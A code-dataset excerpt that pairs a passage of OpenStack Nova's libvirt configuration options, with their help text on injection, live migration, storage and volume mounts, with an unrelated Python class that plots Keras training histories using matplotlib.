* ``disk_prefix``: depends on this
* ``cpu_mode``: depends on this
* ``cpu_model``: depends on this
"""),
cfg.StrOpt('connection_uri',
default='',
help="""
Overrides the default libvirt URI of the chosen virtualization type.
If set, Nova will use this URI to connect to libvirt.
Possible values:
* An URI like ``qemu:///system`` or ``xen+ssh://oirase/`` for example.
This is only necessary if the URI differs to the commonly known URIs
for the chosen virtualization type.
Related options:
* ``virt_type``: Influences what is used as default value here.
"""),
cfg.BoolOpt('inject_password',
default=False,
help="""
Allow the injection of an admin password for instance only at ``create`` and
``rebuild`` process.
There is no agent needed within the image to do this. If *libguestfs* is
available on the host, it will be used. Otherwise *nbd* is used. The file
system of the image will be mounted and the admin password, which is provided
in the REST API call will be injected as password for the root user. If no
root user is available, the instance won't be launched and an error is thrown.
Be aware that the injection is *not* possible when the instance gets launched
from a volume.
Possible values:
* True: Allows the injection.
* False (default): Disallows the injection. Any via the REST API provided
admin password will be silently ignored.
Related options:
* ``inject_partition``: That option will decide about the discovery and usage
of the file system. It also can disable the injection at all.
"""),
cfg.BoolOpt('inject_key',
default=False,
help="""
Allow the injection of an SSH key at boot time.
There is no agent needed within the image to do this. If *libguestfs* is
available on the host, it will be used. Otherwise *nbd* is used. The file
system of the image will be mounted and the SSH key, which is provided
in the REST API call will be injected as SSH key for the root user and
appended to the ``authorized_keys`` of that user. The SELinux context will
be set if necessary. Be aware that the injection is *not* possible when the
instance gets launched from a volume.
This config option will enable directly modifying the instance disk and does
not affect what cloud-init may do using data from config_drive option or the
metadata service.
Related options:
* ``inject_partition``: That option will decide about the discovery and usage
of the file system. It also can disable the injection at all.
"""),
cfg.IntOpt('inject_partition',
default=-2,
min=-2,
help="""
Determines the way how the file system is chosen to inject data into it.
*libguestfs* will be used a first solution to inject data. If that's not
available on the host, the image will be locally mounted on the host as a
fallback solution. If libguestfs is not able to determine the root partition
(because there are more or less than one root partition) or cannot mount the
file system it will result in an error and the instance won't be boot.
Possible values:
* -2 => disable the injection of data.
* -1 => find the root partition with the file system to mount with libguestfs
* 0 => The image is not partitioned
* >0 => The number of the partition to use for the injection
Related options:
* ``inject_key``: If this option allows the injection of a SSH key it depends
on value greater or equal to -1 for ``inject_partition``.
* ``inject_password``: If this option allows the injection of an admin password
it depends on value greater or equal to -1 for ``inject_partition``.
* ``guestfs`` You can enable the debug log level of libguestfs with this
config option. A more verbose output will help in debugging issues.
* ``virt_type``: If you use ``lxc`` as virt_type it will be treated as a
single partition image
"""),
cfg.BoolOpt('use_usb_tablet',
default=True,
deprecated_for_removal=True,
deprecated_reason="This option is being replaced by the "
"'pointer_model' option.",
deprecated_since='14.0.0',
help="""
Enable a mouse cursor within a graphical VNC or SPICE sessions.
This will only be taken into account if the VM is fully virtualized and VNC
and/or SPICE is enabled. If the node doesn't support a graphical framebuffer,
then it is valid to set this to False.
Related options:
* ``[vnc]enabled``: If VNC is enabled, ``use_usb_tablet`` will have an effect.
* ``[spice]enabled`` + ``[spice].agent_enabled``: If SPICE is enabled and the
spice agent is disabled, the config value of ``use_usb_tablet`` will have
an effect.
"""),
cfg.StrOpt('live_migration_inbound_addr',
help="""
The IP address or hostname to be used as the target for live migration traffic.
If this option is set to None, the hostname of the migration target compute
node will be used.
This option is useful in environments where the live-migration traffic can
impact the network plane significantly. A separate network for live-migration
traffic can then use this config option and avoids the impact on the
management network.
Possible values:
* A valid IP address or hostname, else None.
"""),
# TODO(hieulq): change to URIOpt for validating schemas with next release
# of oslo_config.
cfg.StrOpt('live_migration_uri',
deprecated_for_removal=True,
deprecated_since="15.0.0",
deprecated_reason="""
live_migration_uri is deprecated for removal in favor of two other options that
allow to change live migration scheme and target URI: ``live_migration_scheme``
and ``live_migration_inbound_addr`` respectively.
""",
help="""
Live migration target URI to use.
Override the default libvirt live migration target URI (which is dependent
on virt_type). Any included "%s" is replaced with the migration target
hostname.
If this option is set to None (which is the default), Nova will automatically
generate the `live_migration_uri` value based on only 3 supported `virt_type`
in following list:
* 'kvm': 'qemu+tcp://%s/system'
* 'qemu': 'qemu+tcp://%s/system'
* 'xen': 'xenmigr://%s/system'
Related options:
* ``live_migration_inbound_addr``: If ``live_migration_inbound_addr`` value
is not None, the ip/hostname address of target compute node is used instead
of ``live_migration_uri`` as the uri for live migration.
* ``live_migration_scheme``: If ``live_migration_uri`` is not set, the scheme
used for live migration is taken from ``live_migration_scheme`` instead.
"""),
cfg.StrOpt('live_migration_scheme',
help="""
Schema used for live migration.
Override the default libvirt live migration scheme (which is dependant on
virt_type). If this option is set to None, nova will automatically choose a
sensible default based on the hypervisor. It is not recommended that you change
this unless you are very sure that hypervisor supports a particular scheme.
Related options:
* ``virt_type``: This option is meaningful only when ``virt_type`` is set to
`kvm` or `qemu`.
* ``live_migration_uri``: If ``live_migration_uri`` value is not None, the
scheme used for live migration is taken from ``live_migration_uri`` instead.
"""),
cfg.BoolOpt('live_migration_tunnelled',
default=False,
help="""
Enable tunnelled migration.
This option enables the tunnelled migration feature, where migration data is
transported over the libvirtd connection. If enabled, we use the
VIR_MIGRATE_TUNNELLED migration flag, avoiding the need to configure
the network to allow direct hypervisor to hypervisor communication.
If False, use the native transport. If not set, Nova will choose a
sensible default based on, for example the availability of native
encryption support in the hypervisor. Enable this option will definitely
impact performance massively.
Note that this option is NOT compatible with use of block migration.
Possible values:
* Supersedes and (if set) overrides the deprecated 'live_migration_flag' and
'block_migration_flag' to enable tunneled migration.
"""),
cfg.IntOpt('live_migration_bandwidth',
default=0,
help="""
Maximum bandwidth(in MiB/s) to be used during migration.
If set to 0, the hypervisor will choose a suitable default. Some hypervisors
do not support this feature and will return an error if bandwidth is not 0.
Please refer to the libvirt documentation for further details.
"""),
# TODO(hieulq): Need to add min argument by moving from
# LIVE_MIGRATION_DOWNTIME_MIN constant.
cfg.IntOpt('live_migration_downtime',
default=500,
help="""
Maximum permitted downtime, in milliseconds, for live migration
switchover.
Will be rounded up to a minimum of %dms. You can increase this value
if you want to allow live-migrations to complete faster, or avoid
live-migration timeout errors by allowing the guest to be paused for
longer during the live-migration switch over.
Related options:
* live_migration_completion_timeout
""" % LIVE_MIGRATION_DOWNTIME_MIN),
# TODO(hieulq): Need to add min argument by moving from
# LIVE_MIGRATION_DOWNTIME_STEPS_MIN constant.
cfg.IntOpt('live_migration_downtime_steps',
default=10,
help="""
Number of incremental steps to reach max downtime value.
Will be rounded up to a minimum of %d steps.
""" % LIVE_MIGRATION_DOWNTIME_STEPS_MIN),
# TODO(hieulq): Need to add min argument by moving from
# LIVE_MIGRATION_DOWNTIME_DELAY_MIN constant.
cfg.IntOpt('live_migration_downtime_delay',
default=75,
help="""
Time to wait, in seconds, between each step increase of the migration
downtime.
Minimum delay is %d seconds. Value is per GiB of guest RAM + disk to be
transferred, with lower bound of a minimum of 2 GiB per device.
""" % LIVE_MIGRATION_DOWNTIME_DELAY_MIN),
cfg.IntOpt('live_migration_completion_timeout',
default=800,
mutable=True,
help="""
Time to wait, in seconds, for migration to successfully complete transferring
data before aborting the operation.
Value is per GiB of guest RAM + disk to be transferred, with lower bound of
a minimum of 2 GiB. Should usually be larger than downtime delay * downtime
steps. Set to 0 to disable timeouts.
Related options:
* live_migration_downtime
* live_migration_downtime_steps
* live_migration_downtime_delay
"""),
cfg.IntOpt('live_migration_progress_timeout',
default=0,
deprecated_for_removal=True,
deprecated_reason="Serious bugs found in this feature.",
mutable=True,
help="""
Time to wait, in seconds, for migration to make forward progress in
transferring data before aborting the operation.
Set to 0 to disable timeouts.
This is deprecated, and now disabled by default because we have found serious
bugs in this feature that caused false live-migration timeout failures. This
feature will be removed or replaced in a future release.
"""),
cfg.BoolOpt('live_migration_permit_post_copy',
default=False,
help="""
This option allows nova to switch an on-going live migration to post-copy
mode, i.e., switch the active VM to the one on the destination node before the
migration is complete, therefore ensuring an upper bound on the memory that
needs to be transferred. Post-copy requires libvirt>=1.3.3 and QEMU>=2.5.0.
When permitted, post-copy mode will be automatically activated if a
live-migration memory copy iteration does not make percentage increase of at
least 10% over the last iteration.
The live-migration force complete API also uses post-copy when permitted. If
post-copy mode is not available, force complete falls back to pausing the VM
to ensure the live-migration operation will complete.
When using post-copy mode, if the source and destination hosts loose network
connectivity, the VM being live-migrated will need to be rebooted. For more
details, please see the Administration guide.
Related options:
* live_migration_permit_auto_converge
"""),
cfg.BoolOpt('live_migration_permit_auto_converge',
default=False,
help="""
This option allows nova to start live migration with auto converge on.
Auto converge throttles down CPU if a progress of on-going live migration
is slow. Auto converge will only be used if this flag is set to True and
post copy is not permitted or post copy is unavailable due to the version
of libvirt and QEMU in use. Auto converge requires libvirt>=1.2.3 and
QEMU>=1.6.0.
Related options:
* live_migration_permit_post_copy
"""),
cfg.StrOpt('snapshot_image_format',
choices=('raw', 'qcow2', 'vmdk', 'vdi'),
help="""
Determine the snapshot image format when sending to the image service.
If set, this decides what format is used when sending the snapshot to the
image service.
If not set, defaults to same type as source image.
Possible values:
* ``raw``: RAW disk format
* ``qcow2``: KVM default disk format
* ``vmdk``: VMWare default disk format
* ``vdi``: VirtualBox default disk format
* If not set, defaults to same type as source image.
"""),
cfg.StrOpt('disk_prefix',
help="""
Override the default disk prefix for the devices attached to an instance.
If set, this is used to identify a free disk device name for a bus.
Possible values:
* Any prefix which will result in a valid disk device name like 'sda' or 'hda'
for example. This is only necessary if the device names differ to the
commonly known device name prefixes for a virtualization type such as: sd,
xvd, uvd, vd.
Related options:
* ``virt_type``: Influences which device type is used, which determines
the default disk prefix.
"""),
cfg.IntOpt('wait_soft_reboot_seconds',
default=120,
help='Number of seconds to wait for instance to shut down after'
' soft reboot request is made. We fall back to hard reboot'
' if instance does not shutdown within this window.'),
cfg.StrOpt('cpu_mode',
choices=('host-model', 'host-passthrough', 'custom', 'none'),
help="""
Is used to set the CPU mode an instance should have.
If virt_type="kvm|qemu", it will default to "host-model", otherwise it will
default to "none".
Possible values:
* ``host-model``: Clones the host CPU feature flags.
* ``host-passthrough``: Use the host CPU model exactly;
* ``custom``: Use a named CPU model;
* ``none``: Not set any CPU model.
Related options:
* ``cpu_model``: If ``custom`` is used for ``cpu_mode``, set this config
option too, otherwise this would result in an error and the instance won't
be launched.
"""),
cfg.StrOpt('cpu_model',
help="""
Set the name of the libvirt CPU model the instance should use.
Possible values:
* The names listed in /usr/share/libvirt/cpu_map.xml
Related options:
* ``cpu_mode``: Don't set this when ``cpu_mode`` is NOT set to ``custom``.
This would result in an error and the instance won't be launched.
* ``virt_type``: Only the virtualization types ``kvm`` and ``qemu`` use this.
"""),
cfg.StrOpt('snapshots_directory',
default='$instances_path/snapshots',
help='Location where libvirt driver will store snapshots '
'before uploading them to image service'),
cfg.StrOpt('xen_hvmloader_path',
default='/usr/lib/xen/boot/hvmloader',
help='Location where the Xen hvmloader is kept'),
cfg.ListOpt('disk_cachemodes',
default=[],
help='Specific cachemodes to use for different disk types '
'e.g: file=directsync,block=none'),
cfg.StrOpt('rng_dev_path',
help='A path to a device that will be used as source of '
'entropy on the host. Permitted options are: '
'/dev/random or /dev/hwrng'),
cfg.ListOpt('hw_machine_type',
help='For qemu or KVM guests, set this option to specify '
'a default machine type per host architecture. '
'You can find a list of supported machine types '
'in your environment by checking the output of '
'the "virsh capabilities"command. The format of the '
'value for this config option is host-arch=machine-type. '
'For example: x86_64=machinetype1,armv7l=machinetype2'),
cfg.StrOpt('sysinfo_serial',
default='auto',
choices=('none', 'os', 'hardware', 'auto'),
help='The data source used to the populate the host "serial" '
'UUID exposed to guest in the virtual BIOS.'),
cfg.IntOpt('mem_stats_period_seconds',
default=10,
help='A number of seconds to memory usage statistics period. '
'Zero or negative value mean to disable memory usage '
'statistics.'),
cfg.ListOpt('uid_maps',
default=[],
help='List of uid targets and ranges.'
'Syntax is guest-uid:host-uid:count'
'Maximum of 5 allowed.'),
cfg.ListOpt('gid_maps',
default=[],
help='List of guid targets and ranges.'
'Syntax is guest-gid:host-gid:count'
'Maximum of 5 allowed.'),
cfg.IntOpt('realtime_scheduler_priority',
default=1,
help='In a realtime host context vCPUs for guest will run in '
'that scheduling priority. Priority depends on the host '
'kernel (usually 1-99)'),
cfg.ListOpt('enabled_perf_events',
default=[],
help= """
This is a performance event list which could be used as monitor. These events
will be passed to libvirt domain xml while creating a new instances.
Then event statistics data can be collected from libvirt. The minimum
libvirt version is 2.0.0. For more information about `Performance monitoring
events`, refer https://libvirt.org/formatdomain.html#elementsPerf .
Possible values:
* A string list. For example: ``enabled_perf_events = cmt, mbml, mbmt``
The supported events list can be found in
https://libvirt.org/html/libvirt-libvirt-domain.html ,
which you may need to search key words ``VIR_PERF_PARAM_*``
"""),
]
libvirt_imagebackend_opts = [
cfg.StrOpt('images_type',
default='default',
choices=('raw', 'flat', 'qcow2', 'lvm', 'rbd', 'ploop',
'default'),
help="""
VM Images format.
If default is specified, then use_cow_images flag is used instead of this
one.
Related options:
* virt.use_cow_images
* images_volume_group
"""),
cfg.StrOpt('images_volume_group',
help="""
LVM Volume Group that is used for VM images, when you specify images_type=lvm
Related options:
* images_type
"""),
cfg.BoolOpt('sparse_logical_volumes',
default=False,
help="""
Create sparse logical volumes (with virtualsize) if this flag is set to True.
"""),
cfg.StrOpt('images_rbd_pool',
default='rbd',
help='The RADOS pool in which rbd volumes are stored'),
cfg.StrOpt('images_rbd_ceph_conf',
default='', # default determined by librados
help='Path to the ceph configuration file to use'),
cfg.StrOpt('hw_disk_discard',
choices=('ignore', 'unmap'),
help="""
Discard option for nova managed disks.
Requires:
* Libvirt >= 1.0.6
* Qemu >= 1.5 (raw format)
* Qemu >= 1.6 (qcow2 format)
"""),
]
libvirt_imagecache_opts = [
cfg.StrOpt('image_info_filename_pattern',
default='$instances_path/$image_cache_subdirectory_name/'
'%(image)s.info',
deprecated_for_removal=True,
deprecated_since='14.0.0',
deprecated_reason='Image info files are no longer used by the '
'image cache',
help='Allows image information files to be stored in '
'non-standard locations'),
cfg.IntOpt('remove_unused_resized_minimum_age_seconds',
default=3600,
help='Unused resized base images younger than this will not be '
'removed'),
cfg.BoolOpt('checksum_base_images',
default=False,
deprecated_for_removal=True,
deprecated_since='14.0.0',
deprecated_reason='The image cache no longer periodically '
'calculates checksums of stored images. '
'Data integrity can be checked at the block '
'or filesystem level.',
help='Write a checksum for files in _base to disk'),
cfg.IntOpt('checksum_interval_seconds',
default=3600,
deprecated_for_removal=True,
deprecated_since='14.0.0',
deprecated_reason='The image cache no longer periodically '
'calculates checksums of stored images. '
'Data integrity can be checked at the block '
'or filesystem level.',
help='How frequently to checksum base images'),
]
libvirt_lvm_opts = [
cfg.StrOpt('volume_clear',
default='zero',
choices=('none', 'zero', 'shred'),
help="""
Method used to wipe ephemeral disks when they are deleted. Only takes effect
if LVM is set as backing storage.
Possible values:
* none - do not wipe deleted volumes
* zero - overwrite volumes with zeroes
* shred - overwrite volume repeatedly
Related options:
* images_type - must be set to ``lvm``
* volume_clear_size
"""),
cfg.IntOpt('volume_clear_size',
default=0,
min=0,
help="""
Size of area in MiB, counting from the beginning of the allocated volume,
that will be cleared using method set in ``volume_clear`` option.
Possible values:
* 0 - clear whole volume
* >0 - clear specified amount of MiB
Related options:
* images_type - must be set to ``lvm``
* volume_clear - must be set and the value must be different than ``none``
for this option to have any impact
"""),
]
libvirt_utils_opts = [
cfg.BoolOpt('snapshot_compression',
default=False,
help="""
Enable snapshot compression for ``qcow2`` images.
Note: you can set ``snapshot_image_format`` to ``qcow2`` to force all
snapshots to be in ``qcow2`` format, independently from their original image
type.
Related options:
* snapshot_image_format
"""),
]
libvirt_vif_opts = [
cfg.BoolOpt('use_virtio_for_bridges',
default=True,
help='Use virtio for bridge interfaces with KVM/QEMU'),
]
libvirt_volume_opts = [
cfg.ListOpt('qemu_allowed_storage_drivers',
default=[],
help="""
Protocols listed here will be accessed directly from QEMU.
If gluster is present in qemu_allowed_storage_drivers, glusterfs's backend will
pass a disk configuration to QEMU. This allows QEMU to access the volume using
libgfapi rather than mounting GlusterFS via fuse.
Possible values:
* [gluster]
"""),
cfg.BoolOpt('volume_use_multipath',
default=False,
deprecated_name='iscsi_use_multipath',
help="""
Use multipath connection of the iSCSI or FC volume
Volumes can be connected in the LibVirt as multipath devices. This will
provide high availability and fault tolerance.
""")
]
libvirt_volume_aoe_opts = [
cfg.IntOpt('num_aoe_discover_tries',
default=3,
help="""
Number of times to rediscover AoE target to find volume.
Nova provides support for block storage attaching to hosts via AOE (ATA over
Ethernet). This option allows the user to specify the maximum number of retry
attempts that can be made to discover the AoE device.
""")
]
libvirt_volume_glusterfs_opts = [
cfg.StrOpt('glusterfs_mount_point_base',
default=paths.state_path_def('mnt'),
help="""
Absolute path to the directory where the glusterfs volume is mounted on the
compute node.
""")
]
# TODO(sneti): This config option is also used for other protocols like
# fibrechannel, scaleio, disco. So this should be renamed to
# num_volume_scan_tries
libvirt_volume_iscsi_opts = [
cfg.IntOpt('num_iscsi_scan_tries',
default=5,
help="""
Number of times to scan iSCSI target to find volume.
"""),
cfg.StrOpt('iscsi_iface',
deprecated_name='iscsi_transport',
help="""
The iSCSI transport iface to use to connect to target in case offload support
is desired.
Default format is of the form <transport_name>.<hwaddress> where
<transport_name> is one of (be2iscsi, bnx2i, cxgb3i, cxgb4i, qla4xxx, ocs) and
<hwaddress> is the MAC address of the interface and can be generated via the
iscsiadm -m iface command. Do not confuse the iscsi_iface parameter to be
provided here with the actual transport name.
""")
# iser is also supported, but use LibvirtISERVolumeDriver
# instead
]
libvirt_volume_iser_opts = [
cfg.IntOpt('num_iser_scan_tries',
default=5,
help="""
Number of times to scan iSER target to find volume.
iSER is a server network protocol that extends iSCSI protocol to use Remote
Direct Memory Access (RDMA). This option allows the user to specify the maximum
number of scan attempts that can be made to find iSER volume.
"""),
cfg.BoolOpt('iser_use_multipath',
default=False,
help="""
Use multipath connection of the iSER volume.
iSER volumes can be connected as multipath devices. This will provide high
availability and fault tolerance.
""")
]
libvirt_volume_net_opts = [
cfg.StrOpt('rbd_user',
help="""
The RADOS client name for accessing rbd(RADOS Block Devices) volumes.
Libvirt will refer to this user when connecting and authenticating with
the Ceph RBD server.
"""),
cfg.StrOpt('rbd_secret_uuid',
help="""
The libvirt UUID of the secret for the rbd_user volumes.
"""),
]
libvirt_volume_nfs_opts = [
cfg.StrOpt('nfs_mount_point_base',
default=paths.state_path_def('mnt'),
help="""
Directory where the NFS volume is mounted on the compute node.
The default is 'mnt' directory of the location where nova's Python module
is installed.
NFS provides shared storage for the OpenStack Block Storage service.
Possible values:
* A string representing absolute path of mount point.
"""),
cfg.StrOpt('nfs_mount_options',
help="""
Mount options passed to the NFS client. See section of the nfs man page
for details.
Mount options controls the way the filesystem is mounted and how the
NFS client behaves when accessing files on this mount point.
Possible values:
* Any string representing mount options separated by commas.
* Example string: vers=3,lookupcache=pos
"""),
]
libvirt_volume_quobyte_opts = [
cfg.StrOpt('quobyte_mount_point_base',
default=paths.state_path_def('mnt'),
help="""
Directory where the Quobyte volume is mounted on the compute node.
Nova supports Quobyte volume driver that enables storing Block Storage
service volumes on a Quobyte storage back end. This Option sepcifies the
path of the directory where Quobyte volume is mounted.
Possible values:
* A string representing absolute path of mount point.
"""),
cfg.StrOpt('quobyte_client_cfg',
help='Path to a Quobyte Client configuration file.'),
]
libvirt_volume_scality_opts = [
cfg.StrOpt('scality_sofs_config',
help="""
Path or URL to Scality SOFS(Scale-Out File Server) configuration file.
The Scality SOFS provides OpenStack users the option of storing their
data on a high capacity, replicated, highly available Scality Ring object
storage cluster.
"""),
cfg.StrOpt('scality_sofs_mount_point',
default='$state_path/scality',
help="""
Base dir where Scality SOFS shall be mounted.
The Scality volume driver in Nova mounts SOFS and lets the hypervisor access
the volumes.
Possible values:
* $state_path/scality where state_path is a config option that specifies
the top-level directory for maintaining nova's state or Any string
containing the full directory path.
"""),
]
libvirt_volume_smbfs_opts = [
cfg.StrOpt('smbfs_mount_point_base',
default=paths.state_path_def('mnt'),
help="""
Directory where the SMBFS shares are mounted on the compute node.
"""),
cfg.StrOpt('smbfs_mount_options',
default='',
help="""
Mount options passed to the SMBFS client.
Provide SMBFS options as a single string containing all parameters.
See mount.cifs man page for details. Note that the libvirt-qemu ``uid``
and ``gid`` must be specified.
"""),
]
libvirt_remotefs_opts = [
cfg.StrOpt('remote_filesystem_transport',
default='ssh',
choices=('ssh', 'rsync'),
help="""
libvirt's transport method for remote file operations.
Because libvirt cannot use RPC to copy files over network to/from other
compute nodes, other method must be used for:
* creating directory on remote host
* creating file on remote host
* removing file from remote host
* copying file to remote host
""")
]
libvirt_volume_vzstorage_opts = [
cfg.StrOpt('vzstorage_mount_point_base',
default=paths.state_path_def('mnt'),
help="""
Directory where the Virtuozzo Storage clusters are mounted on the compute
node.
This option defines non-standard mountpoint for Vzstorage cluster.
Related options:
* vzstorage_mount_* group of parameters
"""
),
cfg.StrOpt('vzstorage_mount_user',
default='stack',
help="""
Mount owner user name.
This option defines the owner user of Vzstorage cluster mountpoint.
Related options:
* vzstorage_mount_* group of parameters
"""
),
cfg.StrOpt('vzstorage_mount_group',
default='qemu',
help="""
Mount owner group name.
This option defines the owner group of Vzstorage cluster mountpoint.
Related options:
* vzstorage_mount_* group of parameters
"""
),
cfg.StrOpt('vzstorage_mount_perms',
default='0770',
help="""
Mount access mode.
This option defines the access bits of Vzstorage cluster mountpoint,
in the format similar to one of chmod(1) utility, like this: 0770.
It consists of one to four digits ranging from 0 to 7, with missing
lead digits assumed to be 0's.
Related options:
* vzstorage_mount_* group of parameters
"""
),
cfg.StrOpt('vzstorage_log_path',
default='/var/log/pstorage/%(cluster_name)s/nova.log.gz',
help="""
Path to vzstorage client log.
This option defines the log of cluster operations,
it should include "%(cluster_name)s" template to separate
logs from multiple shares.
Related options:
* vzstorage_mount_opts may include more detailed logging options.
"""
),
cfg.StrOpt('vzstorage_cache_path',
default=None,
help="""
Path to the SSD cache file.
You can attach an SSD drive to a client and configure the drive to store
a local cache of frequently accessed data. By having a local cache on a
client's SSD drive, you can increase the overall cluster performance by
up to 10 and more times.
WARNING! There is a lot of SSD models which are not server grade and
may loose arbitrary set of data changes on power loss.
Such SSDs should not be used in Vstorage and are dangerous as may lead
to data corruptions and inconsistencies. Please consult with the manual
on which SSD models are known to be safe or verify it using
vstorage-hwflush-check(1) utility.
This option defines the path which should include "%(cluster_name)s"
template to separate caches from multiple shares.
Related options:
* vzstorage_mount_opts may include more detailed cache options.
"""
),
cfg.ListOpt('vzstorage_mount_opts',
default=[],
help="""
Extra mount options for pstorage-mount
For full description of them, see
https://static.openvz.org/vz-man/man1/pstorage-mount.1.gz.html
Format is a python string representation of arguments list, like:
"[\'-v\', \'-R\', \'500\']"
Shouldn\'t include -c, -l, -C, -u, -g and -m as those have
explicit vzstorage_* options.
Related options:
* All other vzstorage_* options
"""
),
]
ALL_OPTS = list(itertools.chain(
libvirt_general_opts,
libvirt_imagebackend_opts,
libvirt_imagecache_opts,
libvirt_lvm_opts,
libvirt_utils_opts,
libvirt_vif_opts,
libvirt_volume_opts,
libvirt_volume_aoe_opts,
libvirt_volume_glusterfs_opts,
libvirt_volume_iscsi_opts,
libvirt_volume_iser_opts,
libvirt_volume_net_opts,
libvirt_volume_nfs_opts,
libvirt_volume_quobyte_opts,
libvirt_volume_scality_opts,
libvirt_volume_smbfs_opts,
libvirt_remotefs_opts,
libvirt_volume_vzstorage_opts,
))
def register_opts(conf):
conf.register_group(libvirt_group)
conf.register_opts(ALL_OPTS, group=libvirt_group)
def list_opts():
return {libvirt_group: ALL_OPTS}
| 35.516729 | 79 | 0.690365 | [
"Apache-2.0"
] | jeckxie/gxzw-nova | nova/conf/libvirt.py | 38,216 | Python |
import re
import matplotlib.pyplot as plt
from DatasetHandler.ContentSupport import isNotNone, isNone
from Plotter.SavePlots import PlotSaver
class HistoryPlotter(object):
"""
This class provides a History plotting pipeline using mathplot.
"""
_using_history:bool = False # This for a later implemented part of the tool
_path:str = None
_history = None
_history_keys:dict = None
_history_keys_list:list = None
_losses:list = None
_val_losses:list = None
_acc_stdcc_list:list = None
_val_acc_stdcc_list:list = None
_acc_topkcc_list:list = None
_val_acc_topkcc_list:list = None
_learning_rates:list = None
_epochs:int = 0
def __init__(self, model_description:str, path:str = None, history = None, save_it:bool = True, new_style:bool = False):
"""
The class constructor.
Attention: File history plotting is not yet implemented!
:param model_description:str: something to name the image unique and is also the file name
:param path:str: path of a file containing a history
:param history: a history
:param save_it:bool: save the plot instead of showing
:param new_style:bool: desired matplot lib standard or new style
"""
try:
self._model_description = model_description if isNotNone(model_description) else 'undescribed_model'
if isNotNone(path) and isNone(history):
self._path:str = path
self._using_history = False
if isNotNone(history):
self._history = history
self._history_keys = history.history.keys()
self._history_keys_list = list(self._history_keys)
self._using_history = True
self._new_style:bool = new_style
self._save_it:bool = save_it
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.Constructor]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def PlotHistory(self):
"""
Thise method allow to plot a history from directly a keras history.
Plotting from log is not yet implemented!
"""
try:
if self._using_history:
if self._new_style:
self.CollectFromHistory()
self.DirectPlotHistory()
else:
self.OldPlotHistory()
#TODO: Log file history plotting is not yet implemented
#else:
# self.PlotHistoryFromLog()
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.PlotHistory]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def CollectAccFromHistory(self, name:str):
"""
This method collect the accuracy data from the history into 2 lists.
:param name:str: name of the used acc metric
"""
try:
acc_list:list = []
val_acc_list:list = []
name = re.sub('val_', '', name)
if name in self._history_keys:
acc_list = [s for s in self._history_keys if (name == s)]
val_acc_list = [s for s in self._history_keys if ('val_'+name == s)]
if isNotNone(acc_list) and isNotNone(val_acc_list):
self._history_keys_list.remove(name)
self._history_keys_list.remove('val_'+name)
print("Found accuracy metrics in history!")
return acc_list, val_acc_list
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.CollectAccFromHistory]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def CollectLossFromHistory(self):
"""
This method collect the loss metric data from the history.
"""
try:
loss_val:str = 'loss'
if loss_val in self._history_keys:
self._losses = [s for s in self._history_keys if (loss_val == s)]
self._val_losses = [s for s in self._history_keys if ('val'+loss_val in s)]
self._epochs = len(self._history.epoch)
if len(self._losses) == 0 or len(self._val_losses) == 0:
print('Loss is missing in history')
return
if isNotNone(self._losses) and isNotNone(self._val_losses):
self._history_keys_list.remove(loss_val)
self._history_keys_list.remove('val_'+loss_val)
print("Found losses in history!")
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.CollectLossFromHistory]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def CollectLearningRatesFromHistory(self):
"""
This method collect the learning rate metric data from the history.
"""
try:
lr_val:str = 'lr'
if lr_val in self._history_keys:
self._learning_rates = [s for s in self._history_keys if (lr_val == s)]
if isNotNone(self._learning_rates):
self._history_keys_list.remove(lr_val)
print("Found learning rates in history!")
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.CollectLearningRatesFromHistory]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def CollectFromHistory(self):
"""
This method collect all necessary train informations from the history.
"""
if self._using_history:
try:
print("Collect losses from history...")
self.CollectLossFromHistory()
print("Collect learning rate from history...")
self.CollectLearningRatesFromHistory()
print("Collect ", self._history_keys_list[0], " from history...")
self._acc_stdcc_list, self._val_acc_stdcc_list = self.CollectAccFromHistory(name=self._history_keys_list[0])
print("Collect ", self._history_keys_list[0], " from history...")
self._acc_topkcc_list, self._val_acc_topkcc_list = self.CollectAccFromHistory(name=self._history_keys_list[0])
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.CollectFromHistory]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
else:
print('No history initialized!')
def DirectPlotHistory(self):
"""
This method helps to plot a keras history containing losses, accuracy and possibly least learning rates.
"""
try:
fig_num:int = 1
## Loss
self.AccOrLossPlot( fig_num = fig_num,
title = 'Model loss',
metric = 'loss',
axis_labels = ['train', 'validation'],
history_labels = ['Loss', 'Epoch'],
extender = 'loss_epoch_plot',
train_val_lists = [self._losses, self._val_losses])
fig_num += 1
## Top k Categorical Crossentropy
if ('top_k_categorical_accuracy' in self._history_keys) and isNotNone(self._acc_topkcc_list) and isNotNone(self._val_acc_topkcc_list):
self.AccOrLossPlot( fig_num = fig_num,
title = 'Model Top k Categorical Accuracy',
metric = 'top_k_categorical_accuracy',
axis_labels = ['train', 'validation'],
history_labels = ['Top k Categorical Accuracy', 'Epoch'],
extender = 'top_k_categoriacal_epoch_plot',
train_val_lists = [self._acc_topkcc_list, self._val_acc_topkcc_list])
fig_num += 1
## Categorical Crossentropy
if 'categorical_accuracy' in self._history_keys and isNotNone(self._acc_stdcc_list) and isNotNone(self._val_acc_stdcc_list):
self.AccOrLossPlot( fig_num = fig_num,
title = 'Model Categorical Accuracy',
metric = 'categorical_accuracy',
axis_labels = ['train', 'validation'],
history_labels = ['Categorical Accuracy', 'Epoch'],
extender = 'categoriacal_epoch_plot',
train_val_lists = [self._acc_stdcc_list, self._val_acc_stdcc_list])
fig_num += 1
## General
if 'acc' in self._history_keys and isNotNone(self._acc_stdcc_list) and isNotNone(self._val_acc_stdcc_list):
self.AccOrLossPlot( fig_num = fig_num,
title = 'Model Accuracy',
metric = 'accuracy',
axis_labels = ['train', 'validation'],
history_labels = ['Accuracy', 'Epoch'],
extender = 'accuracy_epoch_plot',
train_val_lists = [self._acc_stdcc_list, self._val_acc_stdcc_list])
fig_num += 1
